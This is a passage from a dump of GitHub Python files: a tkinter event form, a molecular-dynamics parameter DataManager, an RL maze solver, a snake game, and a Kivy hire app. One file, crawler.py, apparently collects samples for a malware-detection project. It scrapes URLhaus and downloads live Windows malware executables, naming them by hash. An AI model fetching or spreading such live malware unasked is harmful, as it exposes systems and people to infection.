(\"600x400\")\r\n add_event_win.title(\"Add Event\")\r\n add_event_win.resizable(0,0)\r\n add_event_win.configure(bg = \"#212121\")\r\n \r\n cal = Calendar (add_event_win, selectmode = 'day', date_pattern = ('dd/mm/yyyy'), background = \"black\")\r\n cal.place(x= 330, y= 160)\r\n\r\n def choose_start_date():\r\n chosen_start_date = cal.get_date()\r\n chosen_start_date_label = tk.Label(\r\n middle_frame,\r\n text = chosen_start_date,\r\n font = ('Montserrat', '12'),\r\n background = \"#A8A803\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n chosen_start_date_label.place(x = 180, y = 5)\r\n \r\n def choose_end_date():\r\n chosen_end_date = cal.get_date()\r\n chosen_end_date_label = tk.Label(\r\n middle_frame,\r\n text = chosen_end_date,\r\n font = ('Montserrat', '12', 'bold'),\r\n background = \"#970000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n chosen_end_date_label.place(x = 180, y = 45)\r\n \r\n def exit_add_event():\r\n if len(event_description_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close Add Remark\", \"All changes will be lost.\\nDo you want to continue?\")\r\n if answer:\r\n add_event_win.destroy()\r\n else:\r\n pass\r\n elif len(field1_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close Add Remark\", \"All changes will be lost.\\nDo you want to continue?\")\r\n if answer:\r\n add_event_win.destroy()\r\n else:\r\n pass\r\n elif len(field2_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close Add Remark\", \"All changes will be lost.\\nDo you want to continue?\")\r\n if answer:\r\n add_event_win.destroy()\r\n else:\r\n pass\r\n else:\r\n add_event_win.destroy() \r\n\r\n header_label = tk.Label(\r\n add_event_win,\r\n text = \"NEW EVENT\",\r\n font = ('Montserrat', '15'),\r\n background = \"#212121\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n header_label.place(x = 240, y = 5)\r\n\r\n top_frame = tk.Frame(\r\n add_event_win,\r\n width = 570,\r\n height = 100,\r\n background = \"#2F3030\"\r\n )\r\n top_frame.place(x = 15, y = 40)\r\n\r\n event_description_label = tk.Label(\r\n top_frame,\r\n text = \"EVENT\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n event_description_label.place(x = 10, y = 5)\r\n\r\n event_description_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n event_description_row.place(x = 150, y = 5)\r\n\r\n field1_label = tk.Label(\r\n top_frame,\r\n text = \"Field 1\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n field1_label.place(x = 10, y = 35)\r\n\r\n field1_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n field1_row.place(x = 150, y = 35)\r\n\r\n field2_label = tk.Label(\r\n top_frame,\r\n text = \"Field 2\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n field2_label.place(x = 10, y = 65)\r\n\r\n field2_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n field2_row.place(x = 150, y = 65)\r\n\r\n middle_frame = tk.Frame(\r\n add_event_win,\r\n width = 305,\r\n height = 80,\r\n background = \"#2F3030\"\r\n )\r\n middle_frame.place(x = 15, y = 160)\r\n\r\n start_date_button = tk.Button(\r\n middle_frame,\r\n text = \"Choose Start Date\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 16,\r\n command = choose_start_date,\r\n background = '#464646',\r\n foreground = '#FFFFFF'\r\n )\r\n start_date_button.place(x = 10, y = 5)\r\n\r\n end_date_button = tk.Button(\r\n middle_frame,\r\n text = \"Choose End Date\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 16,\r\n command = choose_end_date,\r\n background = '#464646',\r\n foreground = '#FFFFFF'\r\n )\r\n end_date_button.place(x = 10, y = 45)\r\n\r\n\r\n save_button = tk.Button(\r\n add_event_win,\r\n text = \"SAVE\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = None,\r\n background = '#A8A803',\r\n foreground = '#FFFFFF'\r\n )\r\n save_button.place(x = 480, y = 360)\r\n\r\n exit_button = tk.Button(\r\n add_event_win,\r\n text = \"EXIT\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = exit_add_event,\r\n background = '#970000',\r\n foreground = '#FFFFFF'\r\n )\r\n exit_button.place(x = 370, y = 360)\r\n\r\n bottom_frame = tk.Frame(\r\n add_event_win,\r\n width = 305,\r\n height = 80,\r\n background = \"#2F3030\"\r\n )\r\n bottom_frame.place(x = 15, y = 265)\r\n\r\n start_time_label = tk.Label(\r\n bottom_frame,\r\n text = \"Start Time\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n start_time_label.place(x = 10, y = 5)\r\n\r\n start_time_row = tk.Entry(\r\n bottom_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 20,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n start_time_row.place(x = 150, y = 5)\r\n\r\n end_time_label = tk.Label(\r\n bottom_frame,\r\n text = \"End Time\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n end_time_label.place(x = 10, y = 35)\r\n\r\n end_time_row = tk.Entry(\r\n bottom_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 20,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n end_time_row.place(x = 150, y = 35)\r\n\r\n add_event_win.protocol(\"WM_DELETE_WINDOW\", exit_add_event)\r\n\r\n\r\n\r\n\r\n","repo_name":"RealLifeGeek/Time-Management-System","sub_path":"add_event.py","file_name":"add_event.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12549230610","text":"from pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport os\nimport json\nimport shutil\n\nclass DataManager():\n '''\n The class is used to manage MD simulations database for BO FF parameterization.\n BO uses a mesh, which nodes correspond to different values of FF parameters of interest.\n \"Nodal\" FF parameters are used to run MD simulations. \n DataManager:\n -- create a structure where each node\n \n \n Attributes\n ----------\n bounds : dict\n {resid: {param_name : [x_min, x_max]}}, resid and parameter names as specified in FF file\n df_ff : pandas.DataFrame\n df includes parameter value for each resid and parameter\n ff_fpath : pathlib.Path\n path to FF file\n ff_start: int\n line index to start reading FF file\n ff_end: int\n line index to stop reading FF file \n grid_spec: dictionary\n a dict to setup search space, where array [x_min, x_max, N_vertices] is assigned to each parameter,\n e.g.: {\"Li\" : {\"sigma\" : [0., 0.5, 1.]}}\n ndim : int\n number of dimensions (number of FF parameters to tune) \n nodes : dict\n { resid : {param_name : node_coodrs}}, node_coodrs - list of floats\n node_fpath : pathlib.Path\n path to grid configuration json file \n md_templ_path : pathlib.Path instance\n path to md template with simulation inputs and bash-executive files \n md_templ_path : pathlib.Path instance\n path to md template with simulation inputs and bash-executive files \n params - list\n a sorted list of \"resid parameter_name\" pairs\n root : pathlib.Path instance\n path to database dir\n\n Methods\n -------\n casedir_exists(mutliidx)\n checks if directory with the name according to given multiidx exists\n check_inclusion(pdict)\n checks if point pdict is inside of the bounds\n convert_to_pdict(plist)\n converts coordinates of a point written as a dict into coordinates as a list\n convert_to_plist(pdict)\n converts coordinates of a point written as a list into coordinates as a dict\n create_case(pdict)\n creates a folder named according to multiindex, modifies FF file in the folder\n get_multiidx(pdict)\n returns multiindex of the gride node closest to pdict\n get_node_dict():\n returns a dictionary with node coordinates\n make_casename(pdict)\n returns str - casename according to pdict\n _check_node_f(node_fpath):\n method check if grid_spec from a given json file is equivalent to class grid_spec\n _read_node_f(node_fpath):\n returns a dict read from a json file with node coordinates\n _read_ff_file(ff_fpath):\n reads specified ff file as a pandas DataFrame\n _save_node_f():\n writes dict with node coordinates self.nodes as a json file\n _save_ff_file(self, df, ff_fpath_out):\n writes ff parameters into a given ff file \n '''\n def __init__(self, root, md_templ, grid_spec, ff_fname, ff_start, ff_end, node_fname='_nodes.json'):\n \"\"\"\n Parameters\n ----------\n root - str\n a path to the database dir. If doesn't exist, it is to be created.\n md_templ - str\n a path to MD template folder with prepared simulation data and executable bash script\n grid_spec - dict\n a dict resid: {parameterX : [x_min, x_max, Nx]} , Nx - number of nodes for parameter x = x1 ... xN)\n ff_fname - str\n a file name of the file with specified force field parameters\n ff_start - int\n lines from ff_start to ff_end of file ff_fname are read as pandas.DataFrame\n ff_end - int\n lines from ff_start to ff_end of file ff_fname are read as pandas.DataFrame\n node_fname - str\n file name to save node coordinates for specified parametera\n \"\"\"\n if not isinstance(root, Path):\n root = Path(root)\n self.root = root\n\n self.md_templ = md_templ\n\n self.grid_spec = grid_spec\n params_ = []\n for resid in self.grid_spec:\n for param_name in self.grid_spec[resid]:\n params_.append((resid, param_name))\n params_ = sorted(params_)\n self.params = tuple(params_)\n self.ndim = len(self.params)\n\n bounds_, nodes_ = [], []\n for resid, param_name in self.params:\n x_min, x_max, Nx = self.grid_spec[resid][param_name]\n bounds_.append((x_min, x_max))\n nodes_.append(np.linspace(x_min, x_max, Nx))\n self.bounds =tuple(bounds_)\n self.nodes = tuple(nodes_)\n\n\n self.ff_fpath = self.md_templ/ff_fname\n self.ff_start = ff_start\n self.ff_end = ff_end\n self.df_ff =self._read_ff_file(self.ff_fpath)\n\n self.node_fpath = self.root/node_fname\n\n print(f\"\\t Checking {node_fname} file...\", end=\"\")\n if os.path.exists(self.node_fpath):\n print(\"Exists! ... \", end=\"\")\n try:\n self._check_node_f(self.node_fpath)\n except:\n er_mes = f\"{self.node_fpath} does not correspond to grid_spec!\" + \\\n f\"Check {self.root/node_fname}\"\n print(er_mes)\n raise ValueError(0, er_mes)\n else:\n print(\"success!\")\n else:\n print(f\"Not found! Creating {node_fname} according to grid_spec ... \", end=\"\")\n try:\n self._save_node_f()\n except:\n er_mes = f\"could not create {self.node_fpath}\"\n print(er_mes)\n raise OSError(0, er_mes)\n else:\n print(\"success!\") \n\n \n print(f\"Initialization: database {self.root} ... \", end=\"\")\n if os.path.exists(self.node_fpath):\n print(f\"already exists! Checking {node_fname} file ....\")\n self._check_node_f(self.node_fpath)\n print(\"Success! Database manager is created!!!\")\n\n def casedir_exists(self, multiidx):\n \"\"\"\n check if there is a directory with the name specified by multiidx\n \"\"\"\n casename = self.make_casename(multiidx)\n casepath = self.root/casename\n return os.path.exists(casepath)\n \n def check_inclusion(self, pdict):\n \"\"\"\n checks if point with coordinates pdict = {resid : {param_name : param_value}} \n is inside of the search space defined by self.grid_spec\n \"\"\"\n plist = self.convert_to_plist(pdict)\n for i in range(len(plist)):\n resid, param_name = self.params[i]\n xi = plist[i]\n low_b, high_b = self.bounds[i]\n assert (xi >= low_b and xi <= high_b), \"Point out of the bound ({resid}, {param_name})!\"\n return True\n\n def convert_to_pdict(self, plist):\n \"\"\"\n converts point cordinates as dict (pdict) to \n point coordinates as list (plist) according to self.params order \n \"\"\"\n pdict = {}\n for i, (resid, param_name) in enumerate(self.params):\n param_value = plist[i]\n pdict[resid] = pdict[resid] if resid in pdict else {}\n pdict[resid].update({param_name: param_value})\n return pdict\n\n def convert_to_plist(self, pdict):\n \"\"\"\n converts point cordinates as list (pdict) to point coordinates \n as dict (plist) according to self.params order \n \"\"\"\n plist = []\n for resid, param_name in self.params:\n param_value = pdict[resid][param_name]\n plist.append(param_value)\n return plist \n\n def create_case(self, pdict):\n \"\"\"\n Creates a folder with name corresponding to pdict. If folder exists,\n throws a warning. \n Parameters:\n -----------\n pdict : dict\n dict of paramater values - coordinates, {resid : {param_name : param_value}} \n Returns:\n --------\n path to casedir as str / None if casedir wasn't created\n \"\"\"\n multiidx = self.get_multiidx(pdict)\n if not multiidx:\n return False\n\n casename = self.make_casename(multiidx)\n ff_fname = self.ff_fpath.name\n casepath = self.root/casename\n\n if not self.check_inclusion(pdict):\n print(\"RANGE ERROR!\")\n return None\n if self.casedir_exists(multiidx):\n print(f\"DataManager Warning! The casedir {casename} already exists,\",\n \"no changes are made.\",\n \"The existing MD configuration will be used\")\n return casepath\n else:\n shutil.copytree(self.md_templ, self.root/casename)\n\n df_ff_new = self.df_ff.copy()\n for i, (resid, param_name) in enumerate(self.params):\n idx = multiidx[i]\n param_val = self.nodes[i][idx]\n df_ff_new.at[resid, param_name] = '{:6.5e}'.format(param_val)\n\n ff_fpath_new = casepath/ff_fname\n self._save_ff_file(df_ff_new, ff_fpath_new)\n return casepath\n \n def get_multiidx(self, pdict):\n \"\"\"\n checks inclusion of point pdict and assign multiindex of the nearest\n vertices if point included\n WARNING! It is assumed that a point is located near one of vertices. \n The accuracy of assignments of points in between is not guaranteed. \n Parameters\n ----------\n pdict : dictionary\n dict of paramater values - coordinates, {resid : {param_name : param_value}} \n Returns\n -------\n tuple / None\n returns tuple of int-indices or None if point doesn't belong to the search space\n \"\"\"\n if not self.check_inclusion(pdict):\n return None\n \n mutliidx = []\n for i, (resid, par) in enumerate(self.params):\n nodes_i = self.nodes[i]\n nodes_i = np.array(nodes_i)\n xi = pdict[resid][par]\n idx = np.abs(nodes_i-xi).argmin()\n if not np.isclose(nodes_i[idx], xi):\n print(\"WARNING: get_multiidx: nodes coordinates don't match with point coordinates.\", \n \"However, the closest multiidx is found and ff parameters\",\n \"are set according to grid node at this multiidx \")\n mutliidx.append(idx)\n return tuple(mutliidx)\n \n def get_node_dict(self):\n \"\"\"\n Returns a dictionary with node coordinates for each resid and parameter, \n {resid : {param_name : node_coords}}\n \"\"\" \n node_dict = {}\n for resid in self.grid_spec:\n node_dict[resid] = {}\n for param_name in self.grid_spec[resid]:\n x_min, x_max, Nx = self.grid_spec[resid][param_name]\n node_coord_i = np.linspace(x_min, x_max, Nx)\n node_coord_i = list(node_coord_i) # json doesn't save np.arrays as entries\n node_dict[resid][param_name] = node_coord_i\n return node_dict\n\n def make_casename(self, multiidx):\n \"\"\"\n creates case name according to specified multiidx\n Parameters:\n -----------\n multiidx - list\n list of idx for each resid and parameter\n Returns:\n str as IDX1_IDX2_.._IDXN\n \"\"\"\n casename = f'{multiidx[0] :03d}' \n for idx in multiidx[1:]:\n casename += f'_{idx :03d}'\n return casename \n\n def _check_node_f(self, node_fpath):\n \"\"\"\n method check if grid_spec from a given json file is equivalent to self.grid_spec\n Parameters\n ----------\n node_fpath - str\n a filepath to a file with written node coordinates for each parameter\n \"\"\"\n node_coord_ext = self._read_node_f(node_fpath)\n\n ndim_ext = 0\n for i, (resid, param_name) in enumerate(self.params):\n coord_i = self.nodes[i]\n coord_i_ext = node_coord_ext[resid][param_name]\n if not np.allclose(coord_i, coord_i_ext):\n er_mes = f\"_check_node_f: nodes coordinates do not match with {node_fpath}!\"\n print(er_mes)\n raise ValueError(0, er_mes)\n ndim_ext += 1\n\n if ndim_ext != self.ndim:\n er_mes = f\"_check_node_f: dimension dismatch! Check {node_fpath}!\"\n print(er_mes)\n raise KeyError(0, er_mes)\n return True\n\n def _read_ff_file(self, ff_fpath):\n \"\"\"\n Reads specified ff file as a pandas DataFrame\n \"\"\"\n with open(ff_fpath, 'r',) as f:\n lines = f.readlines()\n df = pd.DataFrame(data=[l.split()[1:] for l in lines[self.ff_start:self.ff_end][1:]])\n col_names = lines[self.ff_start][1:]\n col_names = col_names.split()[1:]\n col_ind = list(range(df.shape[1]))\n col_dict = dict(zip(col_ind, col_names))\n \n row_names = [l.split()[0] for l in lines[self.ff_start:self.ff_end][1:]]\n row_ind = list(range(df.shape[0]))\n row_dict = dict(zip(row_ind, row_names))\n df = df.rename(columns=col_dict, index=row_dict)\n return df\n \n def _read_node_f(self, node_fpath):\n \"\"\"\n reads json file with node coordinates as a dict\n \"\"\"\n with open(node_fpath) as node_f:\n node_dict = json.loads(node_f.read())\n return node_dict\n\n def _save_ff_file(self, df, ff_fpath_out):\n \"\"\"\n writes ff parameters as a Pandas DataFrame into a specified ff file\n Parameters:\n ----------\n df - pandas.DataFrame\n dataframe with specified resid, parameter names and values\n ff_fpath_out - str\n str to ff file to write ff parameters\n \"\"\"\n with open(ff_fpath_out, 'r',) as f:\n lines = f.readlines()\n colums = df.columns\n for i in range(self.ff_start, self.ff_start+df.shape[0]):\n l = list(df.iloc[i-self.ff_start])\n l = [df.index[i-self.ff_start]] + l\n form = ['', '\\t', '\\t', '\\t', '\\t', '\\t', '\\t']\n l = [item for sublist in zip(form,l) for item in sublist]\n l = ''.join(l)\n lines[i+1] = l + '\\n'\n \n f_out = open(ff_fpath_out, 'w')\n for l in lines:\n f_out.write(l)\n f_out.close() \n \n def _save_node_f(self):\n \"\"\"\n writes dict with node coordinates self.nodes as a json file\n (only if the file does not exist)\n Returns\n -------\n True if data are successully saved, False otherwise\n \"\"\"\n if self.node_fpath.exists():\n print(\"File already exists!\")\n return False\n\n node_dict = self.get_node_dict()\n print(node_dict)\n with open(self.node_fpath, \"w\") as node_f:\n json.dump(node_dict, node_f)\n return True\n \n","repo_name":"evgenii-f/MD-opt","sub_path":"lib/DataManager.py","file_name":"DataManager.py","file_ext":"py","file_size_in_byte":14937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44266270061","text":"#site - https://urlhaus.abuse.ch/browse/\nimport os\nimport re\nimport time\nimport hashlib\nimport requests\nfrom tqdm import tqdm\nfrom random import randint\nfrom bs4 import BeautifulSoup as bs\n\nfor x in range(2, 70000, 1):\n url = \"https://urlhaus.abuse.ch/browse/page/%s/\" % x\n print(url)\n response = requests.get(url)\n #print(response.text)\n soup = bs(response.text, 'html.parser')\n table = soup.find('table', {'class': 'table'})\n download_link = []\n\n for row in table.findAll('a'):\n malware = re.findall('^http.*exe$', str(row.get_text()))\n if malware :\n download_link = malware\n\n print(download_link)\n\n # downlaod malware\n for malware in download_link :\n res = requests.get(malware, stream=True)\n\n with open(\"../win_virus/malware\", \"wb\") as handle:\n for data in tqdm(res.iter_content()):\n handle.write(data)\n\n with open(\"../win_virus/malware\",\"rb\") as f:\n bytes = f.read() # read entire file as bytes\n readable_hash = hashlib.sha256(bytes).hexdigest()\n new_name = \"../win_virus/%s\" % readable_hash\n os.rename(\"../win_virus/malware\", new_name)\n\n # go to next page\n time.sleep(randint(12,17))\n","repo_name":"integralstar/AI_Vaccine","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72078761768","text":"'''\nDaniel Vogler\n\nrlmaze.py\nRL learning setup and algo\n\n'''\n\nimport numpy as np\nimport logging\nimport tensorflow as tf\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import InputLayer\nfrom tensorflow.keras.layers import Dense\nfrom .settings import Settings\nfrom .utils import Utils\n\n\n\nclass RLMaze: \n\n def __init__(self,\n cfg_file):\n self.PROJECT_ROOT = Settings().PROJECT_ROOT\n self.PACKAGE_ROOT = Settings().PACKAGE_ROOT\n\n self.cfg = Settings().config( cfg_file )\n\n ### environment\n self.actions = { 0: [0,1], 1: [0,-1], 2: [1,0], 3: [-1,0] }\n self.states = tf.convert_to_tensor( self.cfg.maze_grid.flatten(), np.int64)\n\n ### maze properties\n self.cfg.maze_dim = self.cfg.maze_grid.shape\n self.maze_start = tf.convert_to_tensor( [[self.cfg.maze_start[0] * self.cfg.maze_dim[0] + self.cfg.maze_start[1]]], np.int64)\n self.maze_finish = tf.convert_to_tensor( [[self.cfg.maze_finish[0] * self.cfg.maze_dim[0] + self.cfg.maze_finish[1]]], np.int64)\n self.state = self.maze_start\n\n ### dimensions\n self.actions_dim = len(self.actions)\n self.states_dim = len(self.states)\n\n return\n\n \n def escape_maze(self):\n \"\"\" initialize q-learning setup \n \n args:\n\n return:\n - \n \"\"\"\n\n ### construct NN\n model = self.initialize_model(self.states_dim, self.actions_dim)\n\n ### states identity to feed states into NN\n states_identity = np.identity(len(self.states))\n\n epoch_steps = []\n epsilon = self.cfg.epsilon\n\n ### train maze escaping\n for i in range( self.cfg.epochs ):\n\n logging.debug(f'Epoch ({i}/{self.cfg.epochs})')\n\n ### initialize system\n state = self.maze_start\n self.done = False\n action_counter = 0\n\n epsilon *= self.cfg.epsilon_decay\n\n while self.done == False:\n action_counter += 1\n\n ### q-values for current state\n old_state = state\n q_values_old = model.predict( tf.convert_to_tensor( states_identity[state], np.int64), verbose=0 )\n\n ### explore/exploit\n if np.random.uniform(low=0, high=1) < epsilon:\n ### explore -> randomly choose action from discrete action space\n action_arg = np.random.randint(low=0, high=len(self.actions))\n\n else:\n ### exploit -> choose highest scoring action\n action_arg = np.argmax(q_values_old)\n\n ### determine action, get new state + reward\n action = self.actions[ action_arg ]\n state = old_state + action[0] * self.cfg.maze_dim[0] + action[1]\n state, reward = self.compute_reward( old_state, state)\n\n ### q values for new state\n q_values_state = model.predict( tf.convert_to_tensor( states_identity[state], np.int64), verbose=0 )\n\n ### constrain reward if maze is completed\n if self.done == True:\n target = reward\n\n elif self.done == False:\n target = (reward + self.cfg.gamma * np.max( q_values_state ) )\n\n q_values_old[0, action_arg] = target\n\n ### fit model with updated targets\n model.fit( tf.convert_to_tensor( states_identity[old_state], np.int64), q_values_old, epochs=1, verbose=0)\n\n logging.info(f'Epoch ({i}/{self.cfg.epochs}): epsilon ({epsilon}) - actions ({action_counter})')\n\n ### keep track of required steps in epoch\n epoch_steps.append(action_counter)\n\n # self.agent_location(state)\n logging.info(f'Epoch learning: \\n {epoch_steps}')\n Utils().plot_epochs(epoch_steps, self.cfg.maze_name)\n\n return\n\n\n def initialize_model(self, state_dim: int, action_dim: int) -> keras.Model:\n \"\"\" Initialize NN model\n \n args: \n - state_dim (int): number of states\n - action_dim (int): number of actions\n \n return:\n - model (keras.Model): NN model to train\n \"\"\"\n\n model = Sequential()\n model.add(InputLayer(batch_input_shape=(1, state_dim)))\n model.add(Dense( self.cfg.layer_nodes, activation='relu'))\n model.add(Dense( self.cfg.layer_nodes, activation='relu'))\n model.add(Dense(action_dim, activation='linear'))\n model.compile(loss='mse', optimizer='adam', metrics=['mae'])\n\n return model\n\n\n def compute_reward(self,\n old_state,\n new_state):\n \"\"\" evaluate performed action\n \n args:\n - state (tuple): state before action was performed\n - new_state (tuple): state after action, has to be checked first\n \n return:\n - state (tuple): return (new) state of agent\n \"\"\"\n\n ### check for maze finish\n if new_state == self.maze_finish:\n new_state = new_state\n reward = self.cfg.reward_finish\n logging.debug('Maze finish')\n self.done = True\n\n ### perform action\n elif tf.gather(self.states, new_state) == 0:\n new_state = new_state\n reward = self.cfg.reward_active\n logging.debug('Move forward - new_state')\n\n ### check for wall\n elif tf.gather(self.states, new_state) == 1:\n new_state = old_state\n reward = self.cfg.reward_wall\n logging.debug('Maze wall - use old_state')\n\n else:\n logging.debug('Maze entry not valid')\n\n return new_state, reward\n\n\n def agent_location(self,\n state):\n \"\"\" agent location\n \n args:\n - state (tuple): current state of agent\n \n return:\n\n \"\"\"\n ### agent location\n agent_loc = np.copy( self.cfg.maze_grid[:] )\n agent_loc[state[0]][state[1]] = 5\n\n logging.info(f'\\n Agent location (5) in maze:\\n{agent_loc}')\n\n return","repo_name":"danielvogler/rl_maze","sub_path":"rlmaze/rlmaze.py","file_name":"rlmaze.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15240317370","text":"from turtle import *\r\nimport time\r\nfrom snake import Snake\r\nfrom food import Food\r\nfrom score import Score\r\n\r\nscreen = Screen()\r\nsetup(600, 600)\r\nbgcolor(\"black\")\r\ntitle(\"Snake Game\")\r\ntracer(0)\r\n\r\n\"\"\"\r\nMethod - 1\r\n\r\nsegment_1 = Turtle(\"square\")\r\nsegment_1.color(\"white\")\r\n\r\nsegment_2 = Turtle(\"square\")\r\nsegment_2.color(\"white\")\r\nsegment_2.goto(-20, 0)\r\n\r\nsegment_3 = Turtle(\"square\")\r\nsegment_3.color(\"white\")\r\nsegment_3.goto(-40, 0)\r\n\"\"\"\r\nsnake = Snake()\r\nfood = Food()\r\nscore = Score()\r\n\r\nlisten()\r\nonkey(snake.up, \"Up\")\r\nonkey(snake.down, \"Down\")\r\nonkey(snake.left, \"Left\")\r\nonkey(snake.right, \"Right\")\r\n\r\nflag = True\r\nwhile flag:\r\n update()\r\n time.sleep(0.1)\r\n snake.move()\r\n \"\"\"collision with food\"\"\"\r\n if snake.head.distance(food) < 15:\r\n food.refresh()\r\n snake.extend()\r\n score.increase()\r\n\r\n \"\"\"collision with wall\"\"\"\r\n if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:\r\n # flag = False\r\n score.reset()\r\n snake.reset()\r\n\r\n \"\"\"collision with tail\"\"\"\r\n for segment in snake.segment[1:]:\r\n if snake.head.distance(segment) < 10:\r\n # flag = False\r\n score.reset()\r\n snake.reset()\r\n\r\nscreen.exitonclick()\r\n","repo_name":"swanaa11/Snake_Game","sub_path":"snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15775667675","text":"\r\nfrom kivy.app import App\r\nfrom kivy.lang import Builder\r\nfrom kivy.uix.button import Button\r\nfrom kivy.properties import StringProperty\r\n\r\n__author__ = 'Jiwan Rai'\r\n\r\nclass ItemHireApp(App):\r\n status_text = StringProperty()\r\n\r\n def __init__(self):\r\n super(ItemHireApp, self).__init__()\r\n self.dicDiscp ={}\r\n self.dicPrice = {}\r\n self.dicAvail ={}\r\n\r\n def build(self):\r\n self.title = \"ITEM HIRE APP\"\r\n self.root= Builder.load_file('ItemHire.kv')\r\n self.file_reader()\r\n self.create_entry_bottons()\r\n return self.root\r\n\r\n def file_reader(self):\r\n f= open(\"items.csv\",'r')\r\n movie= f.readlines()\r\n n=0\r\n\r\n\r\n for i in movie:\r\n self.movieName = i.strip().split(',')[0]\r\n self.discp = i.strip().split(',')[1]\r\n self.dicDiscp [self.movieName] = self.discp\r\n self.price = float(i.strip().split(',')[2])\r\n self.dicPrice [self.movieName]= self.price\r\n self.availablity = i.strip().split(',')[-1]\r\n\r\n\r\n if self.availablity== \"out\":\r\n self.dicAvail [self.movieName] = \"*\"\r\n\r\n else:\r\n self.dicAvail[self.movieName] = \"\"\r\n\r\n def add_Item(self, added_name, added_desc, added_number):\r\n f = open(\"Items.csv\", 'a')\r\n new = added_name+\",\"+added_desc+\",\"+str(added_number)+\",\"+\"in\\n\"\r\n f.write(new)\r\n f.close()\r\n\r\n\r\n def return_item(self):\r\n for name in self.dicAvail:\r\n if self.dicAvail[name] == \"*\":\r\n\r\n temp_button = Button(text=name)\r\n temp_button.bind(on_release=self.press_entry_return)\r\n self.root.ids.entriesBox.add_widget(temp_button)\r\n\r\n def press_entry_return(self, instance):\r\n name= instance.text\r\n instance.background_color = (1, 1, 0, 1)\r\n self.dicAvail[name] = \"\"\r\n self.file_updater()\r\n\r\n\r\n\r\n def hire_item(self):\r\n for name in self.dicAvail:\r\n if self.dicAvail[name] == \"\":\r\n\r\n temp_button = Button(text=name)\r\n temp_button.bind(on_release=self.press_entry_hire)\r\n self.root.ids.entriesBox.add_widget(temp_button)\r\n\r\n def press_entry_hire(self, instance):\r\n name= instance.text\r\n instance.background_color = (1, 1, 0, 1)\r\n self.dicAvail[name] = \"\"\r\n self.file_updater()\r\n\r\n\r\n\r\n\r\n def create_entry_bottons(self):\r\n for name in self.dicDiscp:\r\n\r\n temp_button = Button(text=name)\r\n temp_button.bind(on_release=self.press_entry)\r\n self.root.ids.entriesBox.add_widget(temp_button)\r\n\r\n def press_entry(self, instance):\r\n name = instance.text\r\n self.status_text = \"Movie: \"+ name + \"\\nDescription: \" + self.dicDiscp[name] + \"\\nPrice:\" + str(self.dicPrice[name])\r\n\r\n def press_add(self):\r\n\r\n self.status_text = \"Enter details for new items\"\r\n\r\n self.root.ids.popup.open()\r\n\r\n def press_save(self, added_name, added_desc, added_number):\r\n\r\n self.dicPrice[added_name] = added_number\r\n self.dicDiscp[added_name] = added_desc\r\n # change the number of columns based on the number of entries (no more than 5 rows of entries)\r\n self.root.ids.entriesBox.cols = len(self.dicPrice) // 5 + 1\r\n # add button for new entry (same as in create_entry_buttons())\r\n temp_button = Button(text=added_name)\r\n temp_button.background_color = (1, 1, 0, 1)\r\n temp_button.bind(on_release=self.press_entry)\r\n self.root.ids.entriesBox.add_widget(temp_button)\r\n\r\n self.root.ids.popup.dismiss()\r\n self.add_Item(added_name, added_desc, added_number)\r\n self.clear_fields()\r\n\r\n def file_updater(self):\r\n f = open('Item.csv','w')\r\n for name in self.dicDiscp:\r\n new = name +\",\"+self.dicDiscp[name]+\",\"+str(self.dicPrice[name])+\",\"+self.dicAvail[name]+'\\n'\r\n f.write(new)\r\n\r\n f.close()\r\n \r\n\r\n def 